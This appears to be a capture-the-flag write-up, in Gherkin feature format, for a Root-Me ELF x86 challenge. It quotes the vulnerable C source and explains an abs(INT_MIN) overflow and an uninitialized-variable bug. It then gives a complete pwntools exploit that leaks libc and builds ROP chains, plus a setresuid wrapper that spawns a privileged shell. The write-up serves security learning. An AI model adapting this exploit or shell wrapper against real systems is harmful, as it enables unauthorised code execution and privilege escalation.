## Version 2.0
## language: en

Feature: elf-x86-out-of-bounds-attack-french-paradox
  Site:
    rootme
  Category:
    app-system
  User:
    M'baku
  Goal:
    Get shell and read the password

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | GDB-pwndbg      | 1.1.0     |
    | Xshell          | 6.0       |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then a program source code is delivered

  Scenario: Sucess:Finding the bugs in the source code
    Given the source code is delivered
    Then I identified a function with an uninitialized variable
    """
    static unsigned char set_arithmetic_base(void)
    {
        unsigned char b;
        char buf[BUF_SIZE] = "";

        printf("Set the base you'll work with (default=%ld) >>\n", base);
        (void) fgets(buf, sizeof buf, stdin);
        if ('\0' != buf[0]) {
            char *endptr = NULL;
            errno = 0;
            b = strtoul(buf, &endptr, 10);
            if (ERANGE == errno || '\0' == *endptr) {
                perror("strtoul");
                die();
            }
            if (b < 2 ||  b > 16) {
                puts("Please, provide a widely used base.");
                die();
            }
        }

    return b;
    }
    """
    And this means that if the "if" instruction is false
    Then the return of b can be overlaid with a local variable of a function
    When this functions is in a previous stack frame
    Then we have a process() function
    """
    static void process(void)
    {
        int canary = 0xcdcdcdcd;
        int *array = NULL;
        int array_size;

        printf("The size of the dynamic array we'll store values in (max "
        "%d) >>\n", ALLOCA_MAX_SIZE);
        if ((array_size = abs(get_integer_from_user())) > ALLOCA_MAX_SIZE)
            array_size = ALLOCA_MAX_SIZE;

        /* no need to check the return value of alloca(2) */
        array = alloca((array_size + 1) * sizeof *array);
        /* set a canary, just in case... */
        array[array_size] = canary;

        while (1) {
            void (*callbacks[])(int) = {
                [0] = display_binary,
                [1] = display_hexadecimal,
                [2] = display_decimal
            };
            int value = 0, mode = 0, do_quit = 0, index = 0;

            printf("Exit the loop? Yes(0, default), No(1) >>\n");
            if ((do_quit = get_integer_from_user()) == 0)
                break;

            printf("Enter the value to display >>\n");
            value = get_integer_from_user();

            printf("Array index we'll store the value (%#x) at >>\n", value);
            index = get_integer_from_user();
            index = abs(index) % array_size;
            array[index] = value;

            printf("Display mode? 0=binary, 1=hexadecimal, 2=decimal >>\n");
            mode = get_integer_from_user();
            mode = abs(mode) % N_ELEMS(callbacks);
            callbacks[mode](value);
        }

    printf("Display the whole array? Yes(0, default), No(1) >>\n");
    if (0 == get_integer_from_user())
        display_array(array, canary);
    }
    """
    And here I was able to identify two bugs
    """
    1. Undefined behaviour
    2. Integer overflow
    """
    When I was reading about how the abs() function works
    Then I found that it is possible to return a negative value with INT_MIN
    """
    https://man7.org/linux/man-pages/man3/abs.3.html

    NOTES

        Trying to take the absolute value of the most negative integer is not
        defined.
    """
    And second an integer overflows
    """
    #define ALLOCA_MAX_SIZE 4096
    ...
    int array_size; // signed integer

    if ((array_size = abs(get_integer_from_user())) > ALLOCA_MAX_SIZE)
        array_size = ALLOCA_MAX_SIZE;
    """
    Then means that I can assign a value greater than the max size of the array
    And causing an out of bounds and by assigning values to the array
    Then I can perform a return oriented programming

  Scenario: Fail:Use base in given range
    Given it is possible to set a base between 2 and 16
    """
    if (b < 2 ||  b > 16) {
        puts("Please, provide a widely used base.");
        die();
    }
    """
    Then my idea is to take advantage of the abs() bug
    And trigger the integer overflow to have more space available on the stack
    When I tried to do this I saw that it was not possible because 0x80000000
    Then it exceeds the 8 chars allowed by the buffer on a basis of 2 to 16

  Scenario: Sucess:Exploiting the vulnerability
    Given I recognize the bugs
    Then the idea is to set a base greater than 16 to send 0x80000000 (INT_MIN)
    And with the overlap bug I can use prologue() func to set the base variable
    """
    p.sendline('A' * 51 + '\x1e') # name (0x1e = 30d)
    p.recvuntil('>>\n')
    p.sendline('\x00') # base (if ('\0' != buf[0]))
    p.recvuntil('>>\n')
    p.sendline(base_repr(0x80000000, 30))
    """
    Then it's a simple ROP

  Scenario: Sucess: Privilege scalation
    Given I got shell [evidences](shell.png) with the user "app-systeme-ch18"
    And the binary is setuid with the owner "app-systeme-ch18-cracked"
    """
    $ file ch18
    ch18: setuid ELF 32-bit LSB executable, Intel 80386, version 1...
    """
    And the .passwd file its owner is "app-systeme-ch18-cracked" too
    """
    $ ls -la
    ...
    -r--  1 app-systeme-ch18-cracked app-systeme-ch18   20 Aug  2  2018 .passwd
    ...
    -r-sr-x-  1 app-systeme-ch18-cracked app-systeme-ch18 122 Jul 25  2017 ch18
    """
    Then my idea was to make a wrapper to set real owner with setresuid()
    """
    #include <unistd.h>
    #include <sys/types.h>

    int main() {
        setresuid(geteuid(), geteuid(), geteuid());
        char *arg = "/bin/sh";
        execl(arg, NULL, NULL);
        return 0;
    }
    """
    And this is because current shells like /bin/bash drops privileges
    Then I compiled the wrapper in the /tmp folder
    And I modified the exploit to execute the wrapper and voila
    And this is the exploit: [evidences](easy.png)
    """
    from pwn import *

    p = process('./ch18')
    pause()

    def base_repr(number, base=2, padding=0):
        digits = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
        if base > len(digits):
            raise ValueError("Bases greater than 36 not handled in base_repr.")
        elif base < 2:
            raise ValueError("Bases less than 2 not handled in base_repr.")

        num = abs(number)
        res = []
        while num:
            res.append(digits[num % base])
            num //= base
        if padding:
            res.append('0' * padding)
        if number < 0:
            res.append('-')
        return ''.join(reversed(res or '0'))

    def write_in_address(index, value):
        p.recvuntil('>>\n')
        p.sendline('1')
        p.recvuntil('>>\n')
        p.sendline(base_repr(value, 30))
        p.recvuntil('>>\n')
        p.sendline(base_repr(index, 30))
        p.recvuntil('>>\n')
        p.sendline('1')

    p.recvuntil('>>\n')
    p.sendline('A' * 51 + '\x1e') # name
    p.recvuntil('>>\n')
    p.sendline('\x00') # base
    p.recvuntil('>>\n')
    p.sendline(base_repr(0x80000000, 30))

    write_in_address(23, 0x8048560) # puts@plt
    write_in_address(24, 0x8048ce1) # main func
    write_in_address(25, 0x804b018) # fgets@got

    p.recvuntil('>>\n')
    p.sendline('0')
    p.recvuntil('>>\n')
    p.sendline('1')

    fgets = u32(p.recv(4).ljust(4, '\x00'))
    libc = fgets - 0x66080
    sh = libc + 0xecd3
    system = libc + 0x3d250
    execve = libc + 0xbf660 # execve
    gets = libc + 0x67380
    setuid = libc + 0xbff80

    print ("Libc @", hex(libc))
    print ("sh @", hex(sh))
    print ("system() @", hex(system))

    p.recvuntil('>>\n')
    p.sendline('A' * 51 + '\x1e') # name
    p.recvuntil('>>\n')
    p.sendline('\x00') # base
    p.recvuntil('>>\n')
    p.sendline(base_repr(0x80000000, 30))

    write_in_address(23, gets) # system
    write_in_address(24, 0x8048ce1) # main func
    write_in_address(25, 0x804b340) # @data escribible

    p.recvuntil('>>\n')
    p.sendline('0')
    p.recvuntil('>>\n')
    p.sendline('1')

    p.sendline('/tmp/wrp')

    p.recvuntil('>>\n')
    p.sendline('A' * 51 + '\x1e') # name
    p.recvuntil('>>\n')
    p.sendline('\x00') # base
    p.recvuntil('>>\n')
    p.sendline(base_repr(0x80000000, 30))

    write_in_address(23, execve) #0x8048560) # system
    write_in_address(24, 0x8048ce1) # main func
    write_in_address(25, 0x804b340) # @data escribible
    write_in_address(26, 0x804b350) # @data escribible
    write_in_address(27, 0x804b350) # @data escribible

    p.recvuntil('>>\n')
    p.sendline('0')
    p.recvuntil('>>\n')
    p.sendline('1')

    p.interactive()
    """
